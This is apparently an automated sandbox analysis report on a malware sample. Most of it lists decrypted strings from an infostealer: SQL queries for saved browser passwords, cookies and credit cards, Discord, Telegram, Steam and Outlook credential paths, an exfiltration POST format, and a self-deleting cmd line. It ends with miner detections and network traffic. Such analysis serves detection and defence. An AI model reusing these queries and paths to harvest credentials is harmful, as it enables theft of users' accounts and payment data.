Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CharToOemW
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: wsprintfW
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: RegQueryValueExA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: RegEnumKeyExA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: RegOpenKeyExA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: RegCloseKey
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: RegEnumValueA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CryptUnprotectData
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SHGetFolderPathA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: ShellExecuteExA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: InternetOpenUrlA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: InternetConnectA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: InternetCloseHandle
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: InternetOpenA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: HttpSendRequestA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: HttpOpenRequestA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: InternetReadFile
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: InternetCrackUrlA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: StrCmpCA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: StrStrA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: StrCmpCW
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: PathMatchSpecA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: RmStartSession
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: RmRegisterResources
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: RmGetList
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: RmEndSession
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: sqlite3_open
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: sqlite3_step
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: sqlite3_column_text
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: sqlite3_finalize
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: sqlite3_close
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: sqlite3_column_blob
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: encrypted_key
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: PATH
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: NSS_Init
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: NSS_Shutdown
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: PK11_FreeSlot
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: PK11_Authenticate
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: C:\ProgramData\
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Soft:
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: profile:
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Host:
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Login:
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Password:
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Opera
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: OperaGX
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Network
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Cookies
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: .txt
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: TRUE
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: FALSE
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Autofill
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: History
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Name:
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Month:
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Year:
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Card:
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Cookies
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Login Data
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Web Data
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: History
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: logins.json
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: formSubmitURL
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: usernameField
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: encryptedUsername
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: encryptedPassword
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: guid
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: cookies.sqlite
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: formhistory.sqlite
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: places.sqlite
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Plugins
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Local Extension Settings
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Sync Extension Settings
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: IndexedDB
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Opera Stable
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Opera GX Stable
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CURRENT
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: chrome-extension_
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Local State
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: profiles.ini
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: chrome
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: opera
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: firefox
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Wallets
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: ProductName
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: ProcessorNameString
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: DisplayName
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: DisplayVersion
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: freebl3.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: mozglue.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: msvcp140.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: nss3.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: softokn3.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: vcruntime140.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: \Temp\
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: .exe
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: runas
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: open
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: /c start
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: %DESKTOP%
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: %APPDATA%
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: %USERPROFILE%
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: %DOCUMENTS%
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: %RECENT%
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: *.lnk
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Files
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: \discord\
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: \Telegram Desktop\
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: key_datas
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: map*
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Telegram
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: *.tox
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: *.ini
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Password
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: 00000001
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: 00000002
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: 00000003
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: 00000004
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Pidgin
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: \.purple\
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: accounts.xml
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: token:
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Software\Valve\Steam
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SteamPath
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: \config\
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: ssfn*
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: config.vdf
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: DialogConfig.vdf
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: libraryfolders.vdf
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: loginusers.vdf
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: \Steam\
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: sqlite3.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: browsers
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: done
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Soft
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: https
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: POST
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: HTTP/1.1
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: hwid
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: build
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: token
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: file_name
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: file
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: message
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe

Code function: 9_2_665E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,

9_2_665E6C80

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe

Unpacked PE file: 31.2.mp3doctorfree32_64.exe.400000.0.unpack

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49761 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 104.26.9.59:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.130.41.108:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.20.219:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.174.95.43:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.240.132.78:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.240.132.78:443 -> 192.168.2.6:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.3:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.2:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.1:443 -> 192.168.2.6:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.6:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60389 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60398 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60401 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60404 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60410 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60414 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60417 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60418 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60420 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60421 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60424 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60426 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60428 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.210.117.250:443 -> 192.168.2.6:60431 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60433 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60437 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:60441 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.210.117.250:443 -> 192.168.2.6:60446 version: TLS 1.2

